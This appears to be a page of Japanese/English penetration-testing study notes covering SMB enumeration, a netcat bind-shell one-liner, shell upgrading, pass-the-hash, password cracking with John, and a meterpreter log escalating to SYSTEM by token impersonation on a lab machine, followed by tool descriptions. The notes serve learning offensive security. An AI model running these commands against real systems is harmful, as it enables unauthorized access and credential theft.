:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

nmap

NSE (Nmap Script Engine)

Categories

  • safe:- Won't affect the target
  • intrusive:- Not safe: likely to affect the target
  • vuln:- Scan for vulnerabilities
  • exploit:- Attempt to exploit a vulnerability
  • auth:- Attempt to bypass authentication for running services (e.g. Log into an FTP server anonymously)
  • brute:- Attempt to bruteforce credentials for running services
  • discovery:- Attempt to query running services for further information about the network (e.g. query an SNMP server).

More can be found here.
https://nmap.org/book/nse-usage.html

How to find scripts

/usr/share/nmap/scripts/script.db

smb

smbのshareとユーザーをenumerateする

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.166.21

netcat が使用できない場合

mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

The command first creates a named pipe at /tmp/f. It then starts a netcat listener, and connects the input of the listener to the output of the named pipe. The output of the netcat listener (i.e. the commands we send) then gets piped directly into sh, sending the stderr output stream into stdout, and sending stdout itself into the input of the named pipe, thus completing the circle.

Shell upgrading

nc でreverse shellをつないだばかりだと、Ctrl+cでshell全体がkillされたり、TABによるオートコンプリートや矢印キーでhistoryを探したりなどいろいろと不便。

Shellをupgradeすることでこれらを使いやすくする

# bash shellをスポーンする
$ python3 -c 'import pty;pty.spawn("/bin/bash")'

# terminal commands を有効化する (clearコマンドなど)
$ export TERM=xterm

# Ctrl + z で一度jobを停止
(Ctrl + z)

# 自身のterminalに戻ってくるので以下のコマンド実行
# terminal echoをoffにする(これでTAB のコンプリート機能、矢印キーのヒストリー、Ctrl+Cでのプロセスキルなどができるようになる)
# そして、job を fgにする
$ stty raw -echo; fg

Windows registry (レジストリ)

Pass the Hash with Remote Desktop

pth-winexe -U 'admin%hash' //10.10.157.38 cmd.exe

LM and NTLM hashes を使ってログインする。 パスワードのクラックは不要。おどろき。
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/

LFI & RFI (Local/Remote File Inclusion)

XXE

XXE stands for XML Eternal Entity Injection.

  • in-band XXE
    An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.

  • out-of-band (OOB-XXE)
    out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.

Payload Examples
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection

SSTI (Server Side Template Injection)

SSTI is when a user is able to pass in a parameter that can control the template engine that is running on the server.

Extension Validation

File Type Filtering

  • MIME Type

  • Magic Number

Indicate file type. Used in file type validation. Impossible to fake.

Use hexeditor

File Length Filtering

File Name Filtering

File Content Filtering

Cracking /etc/shadow

Usage: unshadow PASSWORD-FILE SHADOW-FILE

$ unshadow passwd shadow > rcvd
$ john --format=sha512crypt --wordlist=~/rockyou.txt rcvd

John single mode

Cracking using John's single mode - word mangling.

The hash file should be prepended with a word and a ":".

Joker:7bf6d9bb82bed1302f331fc6b816aada

Example:

$ john --show --format=raw-md5 hash7.txt
Joker:Jok3r

1 password hash cracked, 0 left

Define custom rules

Zip2John

zip2john [options] [zip file] > [output file]

RaR2John

rar2john [rar file] > [output file]

ssh2john

python3 /opt/john/ssh2john.py [id_rsa private key file] > [output file]

Search vulnerability (suggestion) on Windows

Windows Power Shell Priv-Esc Powerup

Windows Power Shell nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

WinPEAS (Windows Privilege Escalation Awesome Scripts)

Windows Privilege Escalation Token Abuse

Metasploit Incoginito

meterpreter > load incognito                                                                                                                               
Loading extension incognito...Success.  

example

C:\Users\bruce\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled

C:\Users\bruce\Desktop>^C
Terminate channel 1? [y/N]  y                                                                                                                              
meterpreter > load incognito                                                                                                                               
Loading extension incognito...Success.                                                                                                                     
meterpreter > list_tokens /g                                                                                                                               
Usage: list_tokens <list_order_option>                                                                                                                     

Lists all accessible tokens and their privilege level

OPTIONS:

    -g        List tokens by unique groupname
    -u        List tokens by unique username

meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WinDefend
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\netprofm
NT SERVICE\nsi
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\W32Time
NT SERVICE\WdiServiceHost
NT SERVICE\WinHttpAutoProxySvc
NT SERVICE\wscsvc

meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]                                                   
 4     0     System                x64   0                                      
 396   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 524   516   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 572   564   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 580   516   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 608   564   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 668   580   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 676   580   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 684   580   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 772   668   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 848   668   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 920   608   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 936   668   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 992   668   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1012  668   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1016  668   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1044  524   conhost.exe           x64   0        alfred\bruce                  C:\Windows\System32\conhost.exe
 1064  668   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1212  668   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1240  668   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1356  668   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1436  668   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1464  668   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
 1492  668   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1536  2812  powershell.exe        x86   0        alfred\bruce                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
 1628  668   jenkins.exe           x64   0        alfred\bruce                  C:\Program Files (x86)\Jenkins\jenkins.exe
 1720  668   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1756  668   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1828  1628  java.exe              x86   0        alfred\bruce                  C:\Program Files (x86)\Jenkins\jre\bin\java.exe
 1848  668   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1940  524   conhost.exe           x64   0        alfred\bruce                  C:\Windows\System32\conhost.exe
 2452  668   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2624  1536  rse.exe               x86   0        alfred\bruce                  C:\Users\bruce\Desktop\rse.exe
 2812  1828  cmd.exe               x86   0        alfred\bruce                  C:\Windows\SysWOW64\cmd.exe
 3024  668   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 3060  668   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe

meterpreter > migrate 668
[*] Migrating from 2624 to 668...
[*] Migration completed successfully.
meterpreter > 

HTTtrack Websit Copier

HTTrack is a free (GPL, libre/free software) and easy-to-use offline browser utility.

It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.

WinHTTrack is the Windows (from Windows 2000 to Windows 10 and above) release of HTTrack, and WebHTTrack the Linux/Unix/BSD release. See the download page.

Path Analyzer Pro

Path Analyzer Pro delivers advanced network route-tracing with performance tests, DNS, whois, and network resolution to investigate network issues. By integrating all these powerful features into one simple graphical interface, Path Analyzer Pro has become a must-have tool for any network, systems, or security professional on Windows and Mac OS X. Download a FREE trial copy.

Colasoft Packet Builder

Colasoft Packet Builder enables creating custom network packets; users can use this tool to check their network protection against attacks and intruders. Colasoft Packet Builder includes a very powerful editing feature. Besides common HEX editing raw data, it features a Decoding Editor allowing users to edit specific protocol field values much easier.

Users are also able to edit decoding information in two editors - Decode Editor and Hex Editor. Users can select one from the provided templates Ethernet Packet, ARP Packet, IP Packet, TCP Packet and UDP Packet, and change the parameters in the decoder editor, hexadecimal editor or ASCII editor to create packets. Any changes will be immediately displayed in the other two windows. In addition to building packets,Colasoft Packet Builder also supports saving packets to packet files and sending packets to network.

Megaping

MegaPing is the ultimate must-have toolkit that provides essential utilities for Information System specialists, system administrators, IT solution providers or individuals.

NetScanTools Pro

NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for Network Professionals. Research IPv4 addresses, IPv6 addresses, hostnames, domain names, email addresses and URLs automatically** or with manual tools. It is designed for the Windows operating system GUI. **Automated tools are started interactively by the user.

Network Topology Mapper

Network mapping software built to automatically plot your network
Key Features
Automate device discovery and mapping
Build multiple maps from a single scan
Export network diagrams to Visio
Auto-detect changes to network topology
Perform multi-level network discovery
Address regulatory PCI compliance

Angry IP Scanner

Angry IP scanner is a very fast IP address and port scanner.

It can scan IP addresses in any range as well as any their ports. It is cross-platform and lightweight. Not requiring any installations, it can be freely copied and used anywhere.

Angry IP scanner simply pings each IP address to check if it’s alive, then optionally it is resolving its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be extended with plugins.

It also has additional features, like NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc.

IP-Tools

IP-Tools is a great program that allows users to monitor their network activity and data movements. In addition to providing standard information about nodes connected to a network, the application allows monitoring of advanced parameters such as data flow. All in all, this is a great application for network administrators and advanced computer users.

1
2
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
1
2

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?